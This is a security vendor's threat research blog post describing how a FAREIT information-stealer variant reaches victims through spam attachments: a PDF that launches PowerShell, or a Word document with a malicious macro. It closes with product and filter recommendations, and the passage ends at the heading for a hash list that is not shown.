By Ian Lagrazon and Jaaziel Carlos

In 2014, we began seeing attacks that abused the Windows PowerShell. Back then, it was uncommon for malware to use this particular feature of Windows. However, there are several reasons for an attacker to use this scripting technique.

For one, users cannot easily spot any malicious behavior since PowerShell runs in the background. Another is that PowerShell can be used to steal usernames, passwords, and other system information without an executable file being present. This makes it an attractive tool for attackers for carrying out malicious activities while avoiding easy detection.

Last March 2016, we noted that PowerWare crypto-ransomware also abused PowerShell. Recently, we spotted a new attack where PowerShell was abused to deliver a FAREIT variant. This particular family of information stealers has been around since 2011.

New spin on common delivery methods

Like its predecessors, this latest FAREIT variant is delivered via malicious email attachments. Users receive an email with either a malicious .PDF file that exploits Windows PowerShell or a Word document with malicious macro codes.



Figure 1. FAREIT-related spam emails use typical subjects like billing reminder and purchase order



Figure 2. Document containing malicious macro



Figure 3. Malicious PDF exploiting Windows PowerShell

If a user opens the malicious PDF attachment, the PDF executes Windows PowerShell via its OpenAction event to perform its malicious routine. This leads to the download of TSPY_FAREIT on the system, which steals a plethora of information such as stored information (usernames and passwords) in certain browsers, stored email credentials, and bitcoin-related details, among others.

On the other hand, if a user opens the infected Word document and enables Word’s macro feature, the malicious macro drops and executes TSPY_FAREIT. While there’s no unique routine for the final FAREIT payload, we can see how cyber crooks employed these Microsoft features to carry out their nefarious activities.

Securing your data

More and more, we are seeing threats that abuse the PowerShell feature, such as FAREIT and PowerWare. The difference between the two is that PowerWare uses macros first and then runs PowerShell, where the parameters for the malicious code can be found. FAREIT’s malicious PDF, on the other hand, uses OpenAction event to directly run PowerShell with the parameters containing the malicious code.

On separate instances, cyber crooks have proven the effectiveness of using these tactics either for social engineering purposes or for further infection. Macros usually require user’s intervention, but with efficient lures, they are able to trick users into executing the malware.

As both PDFs and macros are used in most organizations and enterprises, employees are quite susceptible to fall for FAREIT. Users are advised to install security software that can detect spammed messages and malicious files related to this threat.

Trend Micro endpoint solutions such as Trend Micro™ Security, Trend Micro™ Smart Protection Suites, and Trend Micro Worry-Free™ Business Security can protect users systems from FAREIT malware by detecting the malicious files and related spam emails used by this FAREIT variant.

TippingPoint also mitigates this threat by making the following filters available to its customers:

9536: Backdoor: Zeus Botnet Command and Control Phone Home Request

16662: HTTP: Possible Malware Communication Attempt

With additional insight from Jack Tang

Here are the related SHA1 hashes related to this attack: